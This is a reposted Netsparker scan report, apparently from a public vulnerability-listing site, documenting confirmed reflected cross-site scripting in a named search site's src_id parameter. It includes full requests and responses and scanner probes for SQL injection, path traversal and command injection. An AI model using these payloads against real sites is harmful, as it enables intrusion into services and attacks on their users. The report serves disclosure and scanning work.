XSS, as.starware.com, DORK GHDB REPORT SUMMARY
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Private Reporting of Security Research is preferred for Online Service Providers
Loading
Netsparker - Scan Report Summary
TARGET URL
http://as.starware.com/dp/search?src_id=305&c...
SCAN DATE
6/20/2011 10:44:07 AM
REPORT DATE
6/20/2011 2:26:37 PM
SCAN DURATION
00:06:18
Total Requests
Average Speed
req/sec.
10
identified
5
confirmed
0
critical
4
informational
SCAN SETTINGS
Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
VULNERABILITY SUMMARY
Vulnerability Summary
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
src_id
GET
'"--></style></script><script>alert(0x000121)</script>
client_id
GET
3
product
GET
unknown
serv
GET
web
version
GET
3
it
GET
-1
step
GET
1
subproduct
GET
site
qry
GET
xss
Request
GET /dp/search?src_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E&client_id=3&product=unknown&serv=web&version=3&it=-1&step=1&subproduct=site&qry=xss HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584693-0--JysgY29udmVydChpbnQsKENIQVIoOTUpK0NIQVIoMzMpK0NIQVIoNjQpK0NIQVIoNTA%3D%2C1308584696-18-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2Vycm8%3D%2C1308584697-2-1-SGFjaw%3D%3D%2C1308584698-12-1-KHNlbGVjdCBzbGVlcCgyNSkpYS0tIDE%3D%2C1308584699-0--Jyk7V0FJVEZPUiBERUxBWSAnMDowOjI1Jy0t%2C1308584701-0--MSBucz1uZXRzcGFya2VyKDB4MDAwMTAzKSA%3D%2C1308584702-0--MSkpO0RFQ0xBUkUvKiovQHgvKiovY2hhcig5KTtTRVQvKiovQHg9Y2hhcig0OCkrY2g%3D%2C1308584704-0--MTtERUNMQVJFLyoqL0B4LyoqL2NoYXIoOSk7U0VULyoqL0B4PWNoYXIoNDgpK2NoYXI%3D%2C1308584707-0--MScgfHwgKHNlbGVjdCBkYm1zX3BpcGUucmVjZWl2ZV9tZXNzYWdlKChjaHIoOTUpfHw%3D%2C1308584710-0--U0VUIC9BIDB4RkZGOTk5OS0yICY%3D%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:45:11 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:45:11 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584696-18-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2Vycm8%3D%2C1308584697-2-1-SGFjaw%3D%3D%2C1308584698-12-1-KHNlbGVjdCBzbGVlcCgyNSkpYS0tIDE%3D%2C1308584699-0--Jyk7V0FJVEZPUiBERUxBWSAnMDowOjI1Jy0t%2C1308584701-0--MSBucz1uZXRzcGFya2VyKDB4MDAwMTAzKSA%3D%2C1308584702-0--MSkpO0RFQ0xBUkUvKiovQHgvKiovY2hhcig5KTtTRVQvKiovQHg9Y2hhcig0OCkrY2g%3D%2C1308584704-0--MTtERUNMQVJFLyoqL0B4LyoqL2NoYXIoOSk7U0VULyoqL0B4PWNoYXIoNDgpK2NoYXI%3D%2C1308584707-0--MScgfHwgKHNlbGVjdCBkYm1zX3BpcGUucmVjZWl2ZV9tZXNzYWdlKChjaHIoOTUpfHw%3D%2C1308584710-0--U0VUIC9BIDB4RkZGOTk5OS0yICY%3D%2C1308584711-7-1-eHNz%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware xss Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = ''"--></style></script><script>netsparker(0x000121)</script>'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/xss">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=xss" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="'"--></style></script><script>netsparker(0x000121)</script>"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="2"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="xss" class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id='%22--></style></script><script>netsparker(0x000121)</script>&product=prefs&bookmark=L2RwL3NlYXJjaD9zcmNfaWQ9JyUyMi0tJTNFJTNDL3N0eWxlJTNFJTNDL3NjcmlwdCUzRSUzQ3NjcmlwdCUzRW5ldHNwYXJrZXIoMHgwMDAxMjEpJTNDL3NjcmlwdCUzRSZjbGllbnRfaWQ9MyZwcm9kdWN0PXVua25vd24mc2Vydj13ZWImdmVyc2lvbj0zJml0PS0xJnN0ZXA9MSZzdWJwcm9kdWN0PXNpdGUmcXJ5PXhzcw==">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Hack</a></p><p><a href="/dp/search?qry=Cookies&qry_lnk=Cookies&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Cookies</a></p><p><a href="/dp/search?qry=XSS+Attack&qry_lnk=XSS+Attack&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">XSS Attack</a></p><p><a href="/dp/search?qry=Cross+Site+Scripting&qry_lnk=Cross+Site+Scripting&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Cross Site Scripting</a></p><p><a href="/dp/search?qry=SQL+Injection&qry_lnk=SQL+Injection&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">SQL Injection</a></p><p><a href="/dp/search?qry=Brown+Sugar+Cookie&qry_lnk=Brown+Sugar+Cookie&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Brown Sugar Cookie</a></p><p><a href="/dp/search?qry=Hack+Yahoo+ID&qry_lnk=Hack+Yahoo+ID&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Hack Yahoo ID</a></p><p><a href="/dp/search?qry=Learn+to+Hack&qry_lnk=Learn+to+Hack&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Learn to Hack</a></p><p><a href="/dp/search?qry=Easy+Cookie+Recipe&qry_lnk=Easy+Cookie+Recipe&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Easy Cookie Recipe</a></p><p><a href="/dp/search?qry=Wireless+Network+Hack&qry_lnk=Wireless+Network+Hack&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss&serv=web">Wireless Network Hack</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=SET+%2FA+0xFFF9999-2+%26&qry_lnk=SET+%2FA+0xFFF9999-2+%26&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">SET /A 0xFFF9999-2 &</a></p><p><a href="/dp/search?qry=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&qry_lnk=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">1' || (select dbms_pipe.r...</a></p><p><a href="/dp/search?qry=1%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bchar&qry_lnk=1%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bchar&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">1;DECLARE/**/@x/**/char(9...</a></p><p><a href="/dp/search?qry=1%29%29%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bch&qry_lnk=1%29%29%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bch&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">1));DECLARE/**/@x/**/char...</a></p><p><a href="/dp/search?qry=1+ns%3Dnetsparker%280x000103%29+&qry_lnk=1+ns%3Dnetsparker%280x000103%29+&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">1 ns=netsparker(0x000103)...</a></p><p><a href="/dp/search?qry=%27%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--&qry_lnk=%27%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">');WAITFOR DELAY '0:0:25'...</a></p><p><a href="/dp/search?qry=%28select+sleep%2825%29%29a--+1&qry_lnk=%28select+sleep%2825%29%29a--+1&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">(select sleep(25))a-- 1</a></p><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">Hack</a></p><p><a href="/dp/search?qry=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferro&qry_lnk=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferro&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">../../../../../../../../....</a></p><p><a href="/dp/search?qry=%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850&qry_lnk=%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850&src_id='%22--></style></script><script>netsparker(0x000121)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2">'+ convert(int,(CHAR(95)+...</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id='%22--></style></script><script>netsparker(0x000121)</script>">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>xss</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CneoYB2v_TbLnIOGm0AGM34m1CPqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QUQ9guJ5-O5eQYEd8hLevshS1ZmFZ3oSyV_eRre0&num=1&sig=AGiWqtw8lBilJxuSYLz9qbEwOP3JxJbq2w&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Web Application Hacking</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CneoYB2v_TbLnIOGm0AGM34m1CPqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QUQ9guJ5-O5eQYEd8hLevshS1ZmFZ3oSyV_eRre0&num=1&sig=AGiWqtw8lBilJxuSYLz9qbEwOP3JxJbq2w&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Hands on web application hacking training. Secure J2EE and .NET</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CneoYB2v_TbLnIOGm0AGM34m1CPqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QUQ9guJ5-O5eQYEd8hLevshS1ZmFZ3oSyV_eRre0&num=1&sig=AGiWqtw8lBilJxuSYLz9qbEwOP3JxJbq2w&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">www.infosecinstitute.com/AppSec</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CYz0YB2v_TbLnIOGm0AGM34m1CNqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0FEPYLidfjvOkVvq4QuiJn5oVl8U&num=2&sig=AGiWqtyWymeqYeM6mGs5Xb0Ym3KJoFnw_Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">ASP.NET Input Security</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CYz0YB2v_TbLnIOGm0AGM34m1CNqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0FEPYLidfjvOkVvq4QuiJn5oVl8U&num=2&sig=AGiWqtyWymeqYeM6mGs5Xb0Ym3KJoFnw_Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">Block SQL Injection, <b>Cross-site</b> <b>scripting</b> and other website attacks</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CYz0YB2v_TbLnIOGm0AGM34m1CNqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0FEPYLidfjvOkVvq4QuiJn5oVl8U&num=2&sig=AGiWqtyWymeqYeM6mGs5Xb0Ym3KJoFnw_Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">www.peterblum.com</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=C7kDFB2v_TbLnIOGm0AGM34m1CITr45kCvIiNjCvyu-kXEAMgh6aBCCgHUPn3ncoFYMkGyAEBqgQcT9AheXW4nH47l5BgR3yGnvO7FLVmYVnehLJX9w&num=3&sig=AGiWqtw0v-t..
Parameters
Parameter
Type
Value
qry
GET
Hack
qry_lnk
GET
Hack
src_id
GET
'"--></style></script><script>alert(0x0001B0)</script>
client_id
GET
3
product
GET
unknown
serv
GET
web
subproduct
GET
site
version
GET
3
it
GET
-1
step
GET
2
rs_prev
GET
xss
Request
GET /dp/search?qry=Hack&qry_lnk=Hack&src_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&rs_prev=xss HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584807-6-1-eHNz%2C1308584808-0--MScgfHwgKHNlbGVjdCBkYm1zX3BpcGUucmVjZWl2ZV9tZXNzYWdlKChjaHIoOTUpfHw%3D%2C1308584810-0--Ki9uZXRzcGFya2VyKDB4MDAwMTcyKTsvKg%3D%3D%2C1308584812-2-1-SGFjaw%3D%3D%2C1308584814-0--TlNGVFc%3D%2C1308584815-0--U0VMRUNUIHBnX3NsZWVwKDI1KS0t%2C1308584816-0--MSk7U0VMRUNUIHBnX3NsZWVwKDI1KS0t%2C1308584817-0--Jyk7U0VMRUNUIHBnX3NsZWVwKDI1KS0t%2C1308584819-0--JykpO1NFTEVDVCBwZ19zbGVlcCgyNSktLQ%3D%3D%2C1308584820-1-1-MSkpO1NFTEVDVCBwZ19zbGVlcCgyNSktLQ%3D%3D%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:47:08 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:47:08 GMT Pragma: no-cache Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware Hack Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = ''"--></style></script><script>netsparker(0x0001B0)</script>'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/Hack">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=Hack" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="'"--></style></script><script>netsparker(0x0001B0)</script>"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="Hack" class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9SGFjayZxcnlfbG5rPUhhY2smc3JjX2lkPSclMjItLSUzRSUzQy9zdHlsZSUzRSUzQy9zY3JpcHQlM0UlM0NzY3JpcHQlM0VuZXRzcGFya2VyKDB4MDAwMUIwKSUzQy9zY3JpcHQlM0UmY2xpZW50X2lkPTMmcHJvZHVjdD11bmtub3duJnNlcnY9d2ViJnN1YnByb2R1Y3Q9c2l0ZSZ2ZXJzaW9uPTMmaXQ9LTEmc3RlcD0yJnJzX3ByZXY9eHNz">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=Hacker&qry_lnk=Hacker&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Hacker</a></p><p><a href="/dp/search?qry=Bot&qry_lnk=Bot&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Bot</a></p><p><a href="/dp/search?qry=Maple+Story+Cheat&qry_lnk=Maple+Story+Cheat&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Maple Story Cheat</a></p><p><a href="/dp/search?qry=Cheats+Nostale&qry_lnk=Cheats+Nostale&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Cheats Nostale</a></p><p><a href="/dp/search?qry=Nostale+Trainer&qry_lnk=Nostale+Trainer&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Nostale Trainer</a></p><p><a href="/dp/search?qry=Adventure+Quest+Hack&qry_lnk=Adventure+Quest+Hack&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Adventure Quest Hack</a></p><p><a href="/dp/search?qry=Hack+Sung+CF&qry_lnk=Hack+Sung+CF&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Hack Sung CF</a></p><p><a href="/dp/search?qry=Cheats+Flyff&qry_lnk=Cheats+Flyff&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Cheats Flyff</a></p><p><a href="/dp/search?qry=Hacking+Training&qry_lnk=Hacking+Training&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Hacking Training</a></p><p><a href="/dp/search?qry=Learn+to+Hack&qry_lnk=Learn+to+Hack&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=Hack&serv=web">Learn to Hack</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=1%29%29%3BSELECT+pg_sleep%2825%29--&qry_lnk=1%29%29%3BSELECT+pg_sleep%2825%29--&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1));SELECT pg_sleep(25)--</a></p><p><a href="/dp/search?qry=%27%29%29%3BSELECT+pg_sleep%2825%29--&qry_lnk=%27%29%29%3BSELECT+pg_sleep%2825%29--&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">'));SELECT pg_sleep(25)--</a></p><p><a href="/dp/search?qry=%27%29%3BSELECT+pg_sleep%2825%29--&qry_lnk=%27%29%3BSELECT+pg_sleep%2825%29--&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">');SELECT pg_sleep(25)--</a></p><p><a href="/dp/search?qry=1%29%3BSELECT+pg_sleep%2825%29--&qry_lnk=1%29%3BSELECT+pg_sleep%2825%29--&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1);SELECT pg_sleep(25)--</a></p><p><a href="/dp/search?qry=SELECT+pg_sleep%2825%29--&qry_lnk=SELECT+pg_sleep%2825%29--&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">SELECT pg_sleep(25)--</a></p><p><a href="/dp/search?qry=NSFTW&qry_lnk=NSFTW&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">NSFTW</a></p><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id='%22--></style></script><script>netsparker(0x0001B0)</script>&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Hack</a></p><p><a 